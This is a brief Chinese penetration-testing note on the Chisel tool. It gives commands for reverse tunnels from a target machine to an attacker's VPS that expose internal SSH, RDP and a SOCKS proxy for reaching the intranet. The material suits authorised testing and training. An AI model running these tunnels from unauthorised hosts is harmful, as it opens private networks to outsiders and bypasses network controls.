Chisel
内网穿透工具
下载地址
https://github.com/jpillora/chisel/releases/tag/v1.7.4
使用示例
1. chisel进行ssh内网穿透
//vps上
./chisel server -p 6666 --reverse
//靶机上
./chisel client -v VPS:6666 R:0.0.0.0:8888:192.168.223.160:22
./chisel client -v VPS:6666 R:8888:192.168.223.160:22
//攻击机上
ssh -p 8888 root@VPS
2. chisel进行远程桌面代理
//vps上
./chisel server -p 6666 --reverse
//靶机上
chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389
//攻击机上连接vps的33389端口
3. chisel进行socks代理
//vps上
./chisel server -p 6666 --reverse
//靶机上
chisel.exe client VPS:6666 R:socks
//随后在vps上
ssh -C -f -N -g -L 0.0.0.0:23333:127.0.0.1:1080 root@VPS
//127.0.0.1监听的是本机上的所有流量,0.0.0.0监听的是所有的IP(不论是不是本机的IP)的流量。所以在vps上把127.0.0.1的1080上的socks流量转发到0.0.0.0的23333端口
//攻击机上使用socksCap或者直接在浏览器中设置代理对内网资源进行访问
引用https://mp.weixin.qq.com/s/_3xhy6V2-YcxWfYE8FYswA